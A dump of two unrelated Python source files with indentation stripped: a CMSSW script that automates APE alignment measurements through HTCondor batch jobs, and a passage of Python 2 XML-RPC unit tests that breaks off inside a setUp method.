# server.server_close()
# exit()
|
autoSubmitter.py
|
from __future__ import print_function
import configparser as ConfigParser
import argparse
import shelve
import sys
import os
import subprocess
import threading
import shutil
import time
import re
from helpers import *
shelve_name = "dump.shelve" # contains all the measurement objects
history_file = "history.log"
clock_interval = 20 # in seconds
delete_logs_after_finish = False # if it is not desired to keep the log and submit script files
use_caf = False
def save(name, object):
# in case of multiple threads running this stops potentially problematic file access
global lock
lock.acquire()
try:
sh = shelve.open(shelve_name)
sh[name] = object
sh.close()
finally:
lock.release()
class Dataset:
name = ""
nFiles = 0
maxEvents = -1
baseDirectory = ""
sampleType = "data1"
fileList = []
conditions = []
def __init__(self, config, name):
dsDict = dict(config.items("dataset:{}".format(name)))
self.name = name
self.baseDirectory = dsDict["baseDirectory"]
self.fileList = []
names = dsDict["fileNames"].split(" ")
for name in names:
parsedNames = replaceAllRanges(name)
for fileName in parsedNames:
self.fileList.append(self.baseDirectory+"/"+fileName)
self.nFiles = len(self.fileList)
if "maxEvents" in dsDict:
self.maxEvents = int(dsDict["maxEvents"])
if "isMC" in dsDict:
if dsDict["isMC"] == "True":
self.sampleType = "MC"
else:
self.sampleType ="data1"
self.conditions, dummy, self.validConditions = loadConditions(dsDict)
# check if any of the sources used for conditions is invalid
if not self.validConditions:
print("Invalid conditions defined for dataset {}".format(self.name))
# check if all files specified exist
self.existingFiles, missingFiles = allFilesExist(self)
if not self.existingFiles:
for fileName in missingFiles:
print("Invalid file name {} defined for dataset {}".format(fileName, self.name))
class Alignment:
name = ""
alignmentName = None
baselineDir = "Design"
globalTag = "None"
isDesign = False
hasAlignmentCondition = False
conditions = []
def __init__(self, config, name):
alDict = dict(config.items("alignment:{}".format(name)))
self.name = name
if "alignmentName" in alDict:
self.alignmentName = alDict["alignmentName"]
if "globalTag" in alDict:
self.globalTag = alDict["globalTag"]
if "baselineDir" in alDict:
self.baselineDir= alDict["baselineDir"]
if "isDesign" in alDict:
self.isDesign= (alDict["isDesign"] == "True")
# If self.hasAlignmentCondition is true, no other Alignment-Object is loaded in apeEstimator_cfg.py using the alignmentName
self.conditions, self.hasAlignmentCondition, self.validConditions = loadConditions(alDict)
# check if any of the sources used for conditions is invalid
if not self.validConditions:
print("Invalid conditions defined for alignment {}".format(self.name))
# check if at least one of the two ways to define the alignment was used
if self.alignmentName == None and not self.hasAlignmentCondition:
print("Error: No alignment object name or record was defined for alignment {}".format(self.name))
sys.exit()
class ApeMeasurement:
name = "workingArea"
curIteration = 0
firstIteration = 0
maxIterations = 15
maxEvents = None
status = STATE_NONE
dataset = None
alignment = None
runningJobs = None
failedJobs = None
startTime = ""
finishTime = ""
def __init__(self, name, config, settings):
self.name = name
self.status = STATE_ITERATION_START
self.runningJobs = []
self.failedJobs = []
self.startTime = subprocess.check_output(["date"]).strip()
# load conditions from dictionary, overwrite defaults if defined
for key, value in settings.items():
if not key.startswith("condition "):
setattr(self, key, value)
# Replace names with actual Dataset and Alignment objects
# In principle, one could preload all these once so they are not
# redefined for each measurement, but right now this does not
# seem necessary
self.dataset = Dataset(config, settings["dataset"])
self.alignment = Alignment(config, settings["alignment"])
# If not defined here, replace by setting from Dataset
if not "maxEvents" in settings:
self.maxEvents = self.dataset.maxEvents
self.firstIteration=int(self.firstIteration)
self.maxIterations=int(self.maxIterations)
self.curIteration = self.firstIteration
self.maxEvents = int(self.maxEvents)
if self.alignment.isDesign:
self.maxIterations = 0
self.conditions, dummy, self.validConditions = loadConditions(settings)
# see if sanity checks passed
if not self.alignment.validConditions or not self.dataset.validConditions or not self.dataset.existingFiles or not self.validConditions:
self.status = STATE_INVALID_CONDITIONS
self.print_status()
self.finishTime = subprocess.check_output(["date"]).strip()
return
if self.alignment.isDesign and self.dataset.sampleType != "MC":
# For now, this won't immediately shut down the program
print("APE Measurement {} is scheduled to to an APE baseline measurement with a dataset that is not marked as isMC=True. Is this intended?".format(self.name))
ensurePathExists('{}/hists/{}'.format(base, self.name))
if not self.alignment.isDesign:
ensurePathExists('{}/hists/{}/apeObjects'.format(base, self.name))
def get_status(self):
return status_map[self.status]
def print_status(self):
print("APE Measurement {} in iteration {} is now in status {}".format(self.name, self.curIteration, self.get_status()))
# submit jobs for track refit and hit categorization
def submit_jobs(self):
toSubmit = []
allConditions = self.alignment.conditions+self.dataset.conditions+self.conditions
allConditions = list({v['record']:v for v in allConditions}.values()) # should we clean for duplicate records? the record last defined (from dataset)
# will be kept in case of overlap, which is the same as if there was no overlap removal
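        # For example (illustrative values only), two entries that share a record collapse to the
        # one defined last:
        #   [{'record': 'R', 'connect': 'c1', 'tag': 'a'}, {'record': 'R', 'connect': 'c2', 'tag': 'b'}]
        #   -> [{'record': 'R', 'connect': 'c2', 'tag': 'b'}]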
ensurePathExists("{}/test/autoSubmitter/workingArea".format(base))
# If conditions are made, create file to load them from
rawFileName = "None"
conditionsFileName = "None"
if len(allConditions) > 0:
conditionsFileName = "{base}/python/conditions/conditions_{name}_iter{iterNo}_cff.py".format(base=base,name=self.name, iterNo=self.curIteration)
rawFileName = "conditions_{name}_iter{iterNo}_cff".format(name=self.name, iterNo=self.curIteration)
with open(conditionsFileName, "w") as fi:
from autoSubmitterTemplates import conditionsFileHeader
fi.write(conditionsFileHeader)
from autoSubmitterTemplates import conditionsTemplate
for condition in allConditions:
fi.write(conditionsTemplate.format(record=condition["record"], connect=condition["connect"], tag=condition["tag"]))
alignmentNameToUse = self.alignment.alignmentName
if self.alignment.hasAlignmentCondition:
alignmentNameToUse = "fromConditions"
lastIter = (self.curIteration==self.maxIterations) and not self.alignment.isDesign
inputCommands = "sample={sample} fileNumber={fileNo} iterNumber={iterNo} lastIter={lastIter} alignRcd={alignRcd} maxEvents={maxEvents} globalTag={globalTag} measurementName={name} conditions={conditions}".format(sample=self.dataset.sampleType,fileNo="$1",iterNo=self.curIteration,lastIter=lastIter,alignRcd=alignmentNameToUse, maxEvents=self.maxEvents, globalTag=self.alignment.globalTag, name=self.name, conditions=rawFileName)
from autoSubmitterTemplates import condorJobTemplate
jobFileContent = condorJobTemplate.format(base=base, inputFile="$2", inputCommands=inputCommands)
jobFileName = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}.tcsh".format(base, self.name,self.curIteration)
with open(jobFileName, "w") as jobFile:
jobFile.write(jobFileContent)
# create a batch job file for each input file
arguments = ""
from autoSubmitterTemplates import condorArgumentTemplate
for i in range(self.dataset.nFiles):
inputFile = self.dataset.fileList[i]
fileNumber = i+1
arguments += condorArgumentTemplate.format(fileNumber=fileNumber, inputFile=inputFile)
# build condor submit script
date = subprocess.check_output(["date", "+%m_%d_%H_%M_%S"]).strip()
sub = "{}/test/autoSubmitter/workingArea/job_{}_iter{}".format(base, self.name, self.curIteration)
errorFileTemp = sub+"_error_{}.txt"
errorFile = errorFileTemp.format("$(ProcId)")
outputFile = sub+"_output_$(ProcId).txt"
logFileTemp= sub+"_condor_{}.log"
logFile = logFileTemp.format("$(ProcId)")
jobFile = sub+".tcsh"
jobName = "{}_{}".format(self.name, self.curIteration)
for i in range(self.dataset.nFiles):
# make file empty if it existed before
with open(logFileTemp.format(i), "w") as fi:
pass
# create submit file
from autoSubmitterTemplates import condorSubTemplate
from autoSubmitterTemplates import condorSubTemplateCAF
if use_caf:
submitFileContent = condorSubTemplateCAF.format(jobFile=jobFileName, outputFile=outputFile, errorFile=errorFile, logFile=logFile, arguments=arguments, jobName=jobName)
else:
submitFileContent = condorSubTemplate.format(jobFile=jobFileName, outputFile=outputFile, errorFile=errorFile, logFile=logFile, arguments=arguments, jobName=jobName)
submitFileName = "{}/test/autoSubmitter/workingArea/submit_{}_jobs_iter{}.sub".format(base, self.name, self.curIteration)
with open(submitFileName, "w") as submitFile:
submitFile.write(submitFileContent)
# submit batch
from autoSubmitterTemplates import submitCondorTemplate
subOut = subprocess.check_output(submitCondorTemplate.format(subFile=submitFileName), shell=True).strip()
if len(subOut) == 0:
print("Running on environment that does not know bsub command or ssh session is timed out (ongoing for longer than 24h?), exiting")
sys.exit()
cluster = subOut.split(" ")[-1][:-1]
for i in range(self.dataset.nFiles):
# list contains condor log files from which to read when job is terminated to detect errors
self.runningJobs.append((logFileTemp.format(i), errorFileTemp.format(i), "{}.{}".format(cluster, i)))
self.status = STATE_BJOBS_WAITING
self.print_status()
def check_jobs(self):
lastStatus = self.status
stillRunningJobs = []
# check all still running jobs
for logName, errName, jobId in self.runningJobs:
# read condor logs instead of doing condor_q or similar, as it is much faster
if not os.path.isfile(logName):
print("{} does not exist even though it should, marking job as failed".format(logName))
self.failedJobs.append( (logName, errName) )
break
with open(logName, "r") as logFile:
log = logFile.read()
if not "submitted" in log:
print("{} was apparently not submitted, did you empty the log file or is condor not working?".format(jobId))
self.failedJobs.append( (logName, errName) )
if "Job was aborted" in log:
print("Job {} of measurement {} in iteration {} was aborted".format(jobId, self.name, self.curIteration))
self.failedJobs.append( (logName, errName) )
elif "Job terminated" in log:
if "Normal termination (return value 0)" in log:
foundErr = False
with open(errName, "r") as err:
for line in err:
if "Fatal Exception" in line.strip():
foundErr = True
break
if not foundErr:
print("Job {} of measurement {} in iteration {} finished successfully".format(jobId, self.name, self.curIteration))
else:
# Fatal error in stderr
print("Job {} of measurement {} in iteration {} has a fatal error, check stderr".format(jobId, self.name, self.curIteration))
self.failedJobs.append( (logName, errName) )
else:
# nonzero return value
print("Job {} of measurement {} in iteration {} failed, check stderr".format(jobId, self.name, self.curIteration))
self.failedJobs.append( (logName, errName) )
else:
stillRunningJobs.append( (logName, errName, jobId) )
self.runningJobs = stillRunningJobs
# at least one job failed
if len(self.failedJobs) > 0:
self.status = STATE_BJOBS_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
elif len(self.runningJobs) == 0:
self.status = STATE_BJOBS_DONE
print("All condor jobs of APE measurement {} in iteration {} are done".format(self.name, self.curIteration))
# remove files
if delete_logs_after_finish:
submitFile = "{}/test/autoSubmitter/workingArea/submit_{}_jobs_iter{}.sub".format(base, self.name, self.curIteration)
jobFile = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}.tcsh".format(base, self.name,self.curIteration)
os.remove(submitFile)
os.remove(jobFile)
for i in range(self.dataset.nFiles):
sub = "{}/test/autoSubmitter/workingArea/job_{}_iter{}".format(base, self.name, self.curIteration)
errorFile = sub+"_error_{}.txt".format(i)
outputFile = sub+"_output_{}.txt".format(i)
logFile = sub+"_condor_{}.log".format(i)
os.remove(errorFile)
os.remove(outputFile)
os.remove(logFile)
if lastStatus != self.status:
self.print_status()
# merges files from jobs
def do_merge(self):
self.status = STATE_MERGE_WAITING
if self.alignment.isDesign:
folderName = '{}/hists/{}/baseline'.format(base, self.name)
else:
folderName = '{}/hists/{}/iter{}'.format(base, self.name, self.curIteration)
# (re)move results from previous measurements before creating folder
if os.path.isdir(folderName):
if os.path.isdir(folderName+"_old"):
shutil.rmtree("{}_old".format(folderName))
os.rename(folderName, folderName+"_old")
os.makedirs(folderName)
# This is so that the structure of the tree can be retrieved by ApeEstimatorSummary.cc and the tree does not have to be rebuilt
if self.curIteration > 0 and not self.alignment.isDesign: # don't have to check for isDesign here because it always ends after iteration 0...
shutil.copyfile('{}/hists/{}/iter{}/allData_iterationApe.root'.format(base, self.name, self.curIteration-1),folderName+"/allData_iterationApe.root")
fileNames = ['{}/hists/{}/{}{}.root'.format(base, self.name, self.dataset.sampleType, str(i)) for i in range(1, self.dataset.nFiles+1)]
fileString = " ".join(fileNames)
from autoSubmitterTemplates import mergeTemplate
merge_result = subprocess.call(mergeTemplate.format(path=folderName, inputFiles=fileString), shell=True) # returns exit code (0 if no error occured)
for name in fileNames:
os.remove(name)
if rootFileValid("{}/allData.root".format(folderName)) and merge_result == 0:
self.status = STATE_MERGE_DONE
else:
self.status = STATE_MERGE_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
# calculates APE
def do_summary(self):
self.status = STATE_SUMMARY_WAITING
from autoSubmitterTemplates import summaryTemplate
if self.alignment.isDesign:
#use measurement name as baseline folder name in this case
inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.name)
else:
inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.alignment.baselineDir)
summary_result = subprocess.call(summaryTemplate.format(inputCommands=inputCommands), shell=True) # returns exit code (0 if no error occured)
if summary_result == 0:
self.status = STATE_SUMMARY_DONE
else:
self.status = STATE_SUMMARY_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
# saves APE to .db file so it can be read out next iteration
def do_local_setting(self):
self.status = STATE_LOCAL_WAITING
from autoSubmitterTemplates import localSettingTemplate
inputCommands = "iterNumber={} setBaseline={} measurementName={}".format(self.curIteration,self.alignment.isDesign,self.name)
local_setting_result = subprocess.call(localSettingTemplate.format(inputCommands=inputCommands), shell=True) # returns exit code (0 if no error occured)
if local_setting_result == 0:
self.status = STATE_LOCAL_DONE
else:
self.status = STATE_LOCAL_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
def finish_iteration(self):
print("APE Measurement {} just finished iteration {}".format(self.name, self.curIteration))
if self.curIteration < self.maxIterations:
self.curIteration += 1
self.status = STATE_ITERATION_START
else:
self.status = STATE_FINISHED
self.finishTime = subprocess.check_output(["date"]).strip()
print("APE Measurement {}, which was started at {} was finished after {} iterations, at {}".format(self.name, self.startTime, self.curIteration, self.finishTime))
def kill(self):
from autoSubmitterTemplates import killJobTemplate
for log, err, jobId in self.runningJobs:
subprocess.call(killJobTemplate.format(jobId=jobId), shell=True)
self.runningJobs = []
self.status = STATE_NONE
def purge(self):
self.kill()
folderName = '{}/hists/{}'.format(base, self.name)
shutil.rmtree(folderName)
# remove log-files as well?
def run_iteration(self):
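        # State flow per polling cycle (status constants imported from helpers): ITERATION_START ->
        # submit_jobs -> BJOBS_WAITING -> check_jobs -> BJOBS_DONE -> do_merge -> MERGE_DONE ->
        # do_summary -> SUMMARY_DONE -> do_local_setting (skipped for isDesign baselines) ->
        # LOCAL_DONE -> finish_iteration, which either starts the next iteration or ends in
        # FINISHED; any *_FAILED state or INVALID_CONDITIONS ends the measurement and is
        # appended to the history file below.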
global threadcounter
global measurements
threadcounter.acquire()
try:
if self.status == STATE_ITERATION_START:
# start bjobs
print("APE Measurement {} just started iteration {}".format(self.name, self.curIteration))
try:
self.submit_jobs()
save("measurements", measurements)
except:
# this is needed in case the scheduler goes down
print("Error submitting jobs for APE measurement {}".format(self.name))
return
if self.status == STATE_BJOBS_WAITING:
# check if bjobs are finished
self.check_jobs()
save("measurements", measurements)
if self.status == STATE_BJOBS_DONE:
# merge files
self.do_merge()
save("measurements", measurements)
if self.status == STATE_MERGE_DONE:
# start summary
self.do_summary()
save("measurements", measurements)
if self.status == STATE_SUMMARY_DONE:
# start local setting (only if not a baseline measurement)
if self.alignment.isDesign:
self.status = STATE_LOCAL_DONE
else:
self.do_local_setting()
save("measurements", measurements)
if self.status == STATE_LOCAL_DONE:
self.finish_iteration()
save("measurements", measurements)
# go to next iteration or finish measurement
if self.status == STATE_BJOBS_FAILED or \
self.status == STATE_MERGE_FAILED or \
self.status == STATE_SUMMARY_FAILED or \
self.status == STATE_LOCAL_FAILED or \
self.status == STATE_INVALID_CONDITIONS or \
self.status == STATE_FINISHED:
with open(history_file, "a") as fi:
fi.write("APE measurement {name} which was started at {start} finished at {end} with state {state} in iteration {iteration}\n".format(name=self.name, start=self.startTime, end=self.finishTime, state=self.get_status(), iteration=self.curIteration))
if self.status == STATE_FINISHED:
global finished_measurements
finished_measurements[self.name] = self
save("finished", finished_measurements)
else:
global failed_measurements
failed_measurements[self.name] = self
self.status = STATE_NONE
save("failed", failed_measurements)
save("measurements", measurements)
if self.status == STATE_ITERATION_START: # this ensures that jobs do not go into idle if many measurements are done simultaneously
# start bjobs
print("APE Measurement {} just started iteration {}".format(self.name, self.curIteration))
self.submit_jobs()
save("measurements", measurements)
finally:
threadcounter.release()
def main():
parser = argparse.ArgumentParser(description="Automatically run APE measurements")
parser.add_argument("-c", "--config", action="append", dest="configs", default=[],
help="Config file that has list of measurements")
parser.add_argument("-k", "--kill", action="append", dest="kill", default=[],
help="List of measurement names to kill (=remove from list and kill all bjobs)")
parser.add_argument("-p", "--purge", action="append", dest="purge", default=[],
help="List of measurement names to purge (=kill and remove folder)")
parser.add_argument("-r", "--resume", action="append", dest="resume", default=[],
help="Resume interrupted APE measurements which are stored in shelves (specify shelves)")
parser.add_argument("-d", "--dump", action="store", dest="dump", default=None,
help='Specify in which .shelve file to store the measurements')
parser.add_argument("-n", "--ncores", action="store", dest="ncores", default=1, type=int,
help='Number of threads running in parallel')
parser.add_argument("-C", "--caf",action="store_true", dest="caf", default=False,
help="Use CAF queue for condor jobs")
args = parser.parse_args()
global base
global clock_interval
global shelve_name
global threadcounter
global lock
global use_caf
use_caf = args.caf
enableCAF(use_caf)
threadcounter = threading.BoundedSemaphore(args.ncores)
lock = threading.Lock()
if args.dump != None: # choose different file than default
shelve_name = args.dump
elif args.resume != []:
shelve_name = args.resume[0]
try:
base = os.environ['CMSSW_BASE']+"/src/Alignment/APEEstimation"
except KeyError:
print("No CMSSW environment was set, exiting")
sys.exit()
killTargets = []
purgeTargets = []
for toConvert in args.kill:
killTargets += replaceAllRanges(toConvert)
for toConvert in args.purge:
purgeTargets += replaceAllRanges(toConvert)
global measurements
measurements = []
global finished_measurements
finished_measurements = {}
global failed_measurements
failed_measurements = {}
if args.resume != []:
for resumeFile in args.resume:
try:
sh = shelve.open(resumeFile)
resumed = sh["measurements"]
resumed_failed = sh["failed"]
resumed_finished = sh["finished"]
sh.close()
for res in resumed:
measurements.append(res)
print("Measurement {} in state {} in iteration {} was resumed".format(res.name, res.get_status(), res.curIteration))
# Killing and purging is done here, because it doesn't make
# sense to kill or purge a measurement that was just started
for to_kill in args.kill:
if res.name == to_kill:
res.kill()
for to_purge in args.purge:
if res.name == to_purge:
res.purge()
failed_measurements.update(resumed_failed)
finished_measurements.update(resumed_finished)
except IOError:
print("Could not resume because {} could not be opened, exiting".format(shelve_name))
sys.exit()
# read out from config file
if args.configs != []:
config = ConfigParser.RawConfigParser()
config.optionxform = str
config.read(args.configs)
# read measurement names
meas = [str(x.split("ape:")[1]) for x in list(config.keys()) if x.startswith("ape:")]
for name in meas:
if name in [x.name for x in measurements]:
print("Error: APE Measurement with name {} already exists, skipping".format(name))
continue
settings = dict(config.items("ape:{}".format(name)))
measurement = ApeMeasurement(name, config, settings)
if measurement.status >= STATE_ITERATION_START and measurement.status <= STATE_FINISHED:
measurements.append(measurement)
print("APE Measurement {} was started".format(measurement.name))
while True:
# remove finished and failed measurements
measurements = [measurement for measurement in measurements if not (measurement.status==STATE_NONE or measurement.status == STATE_FINISHED)]
save("measurements", measurements)
save("failed", failed_measurements)
save("finished", finished_measurements)
list_threads = []
for measurement in measurements:
t = threading.Thread(target=measurement.run_iteration)
list_threads.append(t)
t.start()
# wait for iterations to finish
for t in list_threads:
t.join()
if len(measurements) == 0:
print("No APE measurements are active, exiting")
break
try: # so that interrupting does not give an error message and just ends the program
time_remaining = clock_interval
while time_remaining > 0:
print("Sleeping for {} seconds, you can safely [CTRL+C] now".format(time_remaining))
time.sleep(1)
time_remaining -= 1
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
print("")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
except KeyboardInterrupt:
sys.exit(0)
if __name__ == "__main__":
main()
|
test_xmlrpc.py
|
import base64
import datetime
import sys
import time
import unittest
import xmlrpclib
import SimpleXMLRPCServer
import threading
import mimetools
import httplib
import socket
import StringIO
import os
from test import test_support
try:
unicode
except NameError:
have_unicode = False
else:
have_unicode = True
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2L,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary("my dog has fleas"),
'boolean': xmlrpclib.False,
'unicode': u'\u4000\u6000\u8000',
u'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 02, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 02, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
self.assertEquals(alist,
xmlrpclib.loads(xmlrpclib.dumps((alist,)))[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_datetime set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('20050210T11:41:23'))
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('00010210T11:41:23'))
def test_cmp_datetime_DateTime(self):
now = datetime.datetime.now()
dt = xmlrpclib.DateTime(now.timetuple())
self.assert_(dt == now)
self.assert_(now == dt)
then = now + datetime.timedelta(seconds=4)
self.assert_(then >= dt)
self.assert_(dt < then)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assert_(isinstance(new_d.value, str))
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assert_(isinstance(s, str))
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEquals(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2L**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxint > 2L**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2L**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MININT-1, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEquals(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_default_encoding_issues(self):
# SF bug #1115989: wrong decoding in '_stringify'
utf8 = """<?xml version='1.0' encoding='iso-8859-1'?>
<params>
<param><value>
<string>abc \x95</string>
</value></param>
<param><value>
<struct>
<member>
<name>def \x96</name>
<value><string>ghi \x97</string></value>
</member>
</struct>
</value></param>
</params>
"""
# sys.setdefaultencoding() normally doesn't exist after site.py is
# loaded. reload(sys) is the way to get it back.
old_encoding = sys.getdefaultencoding()
setdefaultencoding_existed = hasattr(sys, "setdefaultencoding")
reload(sys) # ugh!
sys.setdefaultencoding("iso-8859-1")
try:
(s, d), m = xmlrpclib.loads(utf8)
finally:
sys.setdefaultencoding(old_encoding)
if not setdefaultencoding_existed:
del sys.setdefaultencoding
items = d.items()
if have_unicode:
self.assertEquals(s, u"abc \x95")
self.assert_(isinstance(s, unicode))
self.assertEquals(items, [(u"def \x96", u"ghi \x97")])
self.assert_(isinstance(items[0][0], unicode))
self.assert_(isinstance(items[0][1], unicode))
else:
self.assertEquals(s, "abc \xc2\x95")
self.assertEquals(items, [("def \xc2\x96", "ghi \xc2\x97")])
class HelperTestCase(unittest.TestCase):
def test_escape(self):
        self.assertEqual(xmlrpclib.escape("a&b"), "a&amp;b")
        self.assertEqual(xmlrpclib.escape("a<b"), "a&lt;b")
        self.assertEqual(xmlrpclib.escape("a>b"), "a&gt;b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEquals(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEquals(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.DateTime()
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
        self.assertEqual(t2, tref)
class BinaryTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = '\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), d)
def test_decode(self):
d = '\x01\x02\x03abc123\xff\xfe'
de = base64.encodestring(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), d)
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), d)
ADDR = PORT = URL = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
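# (Usage pattern, as in SimpleServerTestCase below: evt.wait() until the server is ready,
#  evt.clear(), run the test, then evt.wait() again in tearDown for the shutdown notification.)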
def http_server(evt, numrequests):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
def get_request(self):
            # Ensure the accepted socket is always blocking.  On Linux, socket
            # attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
serv = MyXMLRPCServer(("localhost", 0),
logRequests=False, bind_and_activate=False)
try:
serv.socket.settimeout(3)
serv.server_bind()
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
        # Connect to the IP address directly.  This avoids socket.create_connection()
        # trying to connect to "localhost" using all address families, which
        # causes slowdown e.g. on Vista, which supports AF_INET6.  The server
        # listens on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x,y: x+y, 'add')
serv.register_function(my_function)
serv.register_instance(TestInstanceClass())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore socket.errors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
return False
# NOTE: The tests in SimpleServerTestCase will ignore failures caused by
# "temporarily unavailable" exceptions raised in SimpleXMLRPCServer. This
# condition occurs infrequently on some platforms, frequently on others, and
# is apparently caused by using SimpleXMLRPCServer with a non-blocking socket.
# If the server class is updated at some point in the future to handle this
# situation more gracefully, these tests should be modified appropriately.
class SimpleServerTestCase(unittest.TestCase):
def setUp(self):
# enable traceback reporting
